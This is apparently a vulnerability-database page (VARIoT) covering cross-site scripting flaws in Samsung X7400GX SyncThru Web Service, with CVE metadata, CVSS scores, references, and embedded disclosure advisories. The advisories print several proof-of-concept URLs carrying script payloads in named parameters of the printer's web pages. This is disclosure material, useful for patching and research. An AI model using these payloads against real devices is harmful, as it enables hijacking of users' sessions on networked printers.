Vulnerabilites related to samsung - x7400gx
var-201903-0461
Vulnerability from variot
SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. <!--
Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
Date: 24-01-2019
Exploit Author: Rafael Pedrero
Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
Tested on: all
CVE : CVE-2019-7418
Category: webapps
- Description
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters: flag, frame, func, and Nfunc.
- Proof of Concept
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &msg=The%20requested%20report(s)%20will%20be%20printed
Parameter frame=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter flag=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter Nfunc=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter func=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter type=bob@alert(XSS).XSSproxy.org
URL
http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed
Parameter popupid=alert("XSS");
- Solution:
Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules
-->
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201903-0461",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "syncthru web service",
"scope": "eq",
"trust": 1.0,
"vendor": "samsung",
"version": null
},
{
"model": "x7400gx",
"scope": "eq",
"trust": 1.0,
"vendor": "samsung",
"version": "6.a6.25"
},
{
"model": "syncthru web service",
"scope": null,
"trust": 0.8,
"vendor": "samsung",
"version": null
},
{
"model": "x7400gx",
"scope": null,
"trust": 0.8,
"vendor": "samsung",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002785"
},
{
"db": "NVD",
"id": "CVE-2019-7418"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/a:samsung:syncthru_web_service",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:samsung:x7400gx_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002785"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Rafael Pedrero",
"sources": [
{
"db": "PACKETSTORM",
"id": "151584"
}
],
"trust": 0.1
},
"cve": "CVE-2019-7418",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CVE-2019-7418",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.9,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-158853",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"id": "CVE-2019-7418",
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2019-7418",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2019-7418",
"trust": 0.8,
"value": "Medium"
},
{
"author": "CNNVD",
"id": "CNNVD-201902-607",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-158853",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2019-7418",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158853"
},
{
"db": "VULMON",
"id": "CVE-2019-7418"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002785"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-607"
},
{
"db": "NVD",
"id": "CVE-2019-7418"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. \u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7418\n# Category: webapps\n\n1. Description\n\nXSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25\nV11.01.05.25_08-21-2015 in \"/sws/swsAlert.sws\" in multiple parameters:\nflag, frame, func, and Nfunc. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n frame=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n flag=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\n\nParameter\n Nfunc=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n func=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n type=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\u0026type=alert\u0026bullet=suc\u0026func=\u0026Nfunc=closePopup(\u0027successMsg\n\u0027,\u0027\u0027,\u0027\u0027)\u0026flag=\u0026frame=\u0026msg=The%20requested%20report(s)%20will%20be%20printed\n\nParameter\n popupid=\u003cSCRIPT\u003ealert(\"XSS\");\u003c/SCRIPT\u003e\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7419\n# Category: webapps\n\n1. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion\u0026ruiFw_pid=Maintenance\u0026ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\n\n\nParameter\n ruiFw_title=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion\u0026ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026ruiFw_title=Mantenimiento\n\n\nParameter\n ruiFw_pid=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\nURL\n\nhttp://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026ruiFw_pid=Maintenance\u0026ruiFw_title=Mantenimiento\n\n\nParameter\n ruiFw_id=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7420\n# Category: webapps\n\n1. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\n\n\nParameter\n tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\u003c!--\n# Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web\nService\n# Date: 24-01-2019\n# Exploit Author: Rafael Pedrero\n# Vendor Homepage: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Software Link: http://www.samsungprinter.com/,\nhttp://www.samsung.com/Support/ProductSupport/download/index.aspx\n# Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System\nFirmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015\n# Tested on: all\n# CVE : CVE-2019-7421\n# Category: webapps\n\n1. \n\n\n2. Proof of Concept\n\nURL\n\nhttp://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org\n\n\nParameter\n contextpath=bob@\u003cSCRipt\u003ealert(XSS)\u003c/scrIPT\u003e.XSSproxy.org\n\n\nURL\n\nhttp://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E\u0026popupid=id_Login\n\n\nParameter\n basedURL=\u003cSCRIPT\u003ealert(XSS);\u003c/SCRIPT\u003e\n\n\n3. Solution:\n\nUpdate to last version this product. \nPatch:\nhttps://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules\n\n\n--\u003e\n\n\n",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002785"
},
{
"db": "VULHUB",
"id": "VHN-158853"
},
{
"db": "PACKETSTORM",
"id": "151584"
}
],
"trust": 0.9
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2019-7418",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "151584",
"trust": 2.7
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002785",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201902-607",
"trust": 0.7
},
{
"db": "VULHUB",
"id": "VHN-158853",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2019-7418",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158853"
},
{
"db": "VULMON",
"id": "CVE-2019-7418"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002785"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-607"
},
{
"db": "NVD",
"id": "CVE-2019-7418"
}
]
},
"id": "VAR-201903-0461",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-158853"
}
],
"trust": 0.01
},
"last_update_date": "2024-11-23T22:12:08.669000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.samsungprinter.com/"
},
{
"title": "SAMSUNG X7400GX SyncThru Web Service Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=89401"
},
{
"title": "Threatpost",
"trust": 0.1,
"url": "https://threatpost.com/rapid-attacks-extort-ransomware/175445/"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2019-7418"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002785"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-607"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158853"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002785"
},
{
"db": "NVD",
"id": "CVE-2019-7418"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.2,
"url": "http://packetstormsecurity.com/files/151584/samsung-x7400gx-sync-thru-web-cross-site-scripting.html"
},
{
"trust": 1.9,
"url": "http://www.samsung.com/support/productsupport/download/index.aspx"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2019/feb/28"
},
{
"trust": 1.8,
"url": "http://www.samsungprinter.com/"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7418"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7418"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://threatpost.com/rapid-attacks-extort-ransomware/175445/"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7421"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=%3cscript%3ealert(xss);%3c/script%3e\u0026ruifw_pid=maintenance\u0026ruifw_title=mantenimiento"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion\u0026ruifw_pid=maintenance\u0026ruifw_title=%3cscript%3ealert(xss);%3c/script%3e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7419"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026bullet=suc\u0026func=\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "https://www.owasp.org/index.php/xss_(cross_site_scripting)_prevention_cheat_sheet#xss_prevention_rules"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.login/gnb/loginview.sws?basedurl=%3cscript%3ealert(xss);%3c/script%3e\u0026popupid=id_login"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.login/gnb/loginview.sws?contextpath=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion\u0026ruifw_pid=%3cscript%3ealert(xss);%3c/script%3e\u0026ruifw_title=mantenimiento"
},
{
"trust": 0.1,
"url": "http://www.samsungprinter.com/,"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws.application/information/networkinformationview.sws?tabname=%3cscript%3ealert(%22xss%22);%3c/script%3e"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-7420"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=\u0026nfunc=closepopup(\u0027successmsg"
},
{
"trust": 0.1,
"url": "http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e\u0026type=alert\u0026bullet=suc\u0026func=\u0026nfunc=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org\u0026flag=\u0026frame=\u0026msg=the%20requested%20report(s)%20will%20be%20printed"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-158853"
},
{
"db": "VULMON",
"id": "CVE-2019-7418"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002785"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-607"
},
{
"db": "NVD",
"id": "CVE-2019-7418"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-158853"
},
{
"db": "VULMON",
"id": "CVE-2019-7418"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-002785"
},
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-607"
},
{
"db": "NVD",
"id": "CVE-2019-7418"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-21T00:00:00",
"db": "VULHUB",
"id": "VHN-158853"
},
{
"date": "2019-03-21T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7418"
},
{
"date": "2019-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002785"
},
{
"date": "2019-02-08T02:22:22",
"db": "PACKETSTORM",
"id": "151584"
},
{
"date": "2019-02-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-607"
},
{
"date": "2019-03-21T16:01:12.750000",
"db": "NVD",
"id": "CVE-2019-7418"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-03-25T00:00:00",
"db": "VULHUB",
"id": "VHN-158853"
},
{
"date": "2019-03-25T00:00:00",
"db": "VULMON",
"id": "CVE-2019-7418"
},
{
"date": "2019-04-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-002785"
},
{
"date": "2019-04-01T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201902-607"
},
{
"date": "2024-11-21T04:48:11.237000",
"db": "NVD",
"id": "CVE-2019-7418"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201902-607"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAMSUNG X7400GX SyncThru Web Service Vulnerable to cross-site scripting",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-002785"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "xss",
"sources": [
{
"db": "PACKETSTORM",
"id": "151584"
},
{
"db": "CNNVD",
"id": "CNNVD-201902-607"
}
],
"trust": 0.7
}
}
var-201903-0463
Vulnerability from variot
XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws.application/information/networkinformationView.sws" in the tabName parameter. The vulnerability stems from the lack of correct verification of client data in WEB applications. An attacker could exploit this vulnerability to execute client code. <!--
Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web
Service
Date: 24-01-2019
Exploit Author: Rafael Pedrero
Vendor Homepage: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
Software Link: http://www.samsungprinter.com/,
http://www.samsung.com/Support/ProductSupport/download/index.aspx
Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System
Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015
Tested on: all
CVE : CVE-2019-7418
Category: webapps
-
Proof of Concept
URL
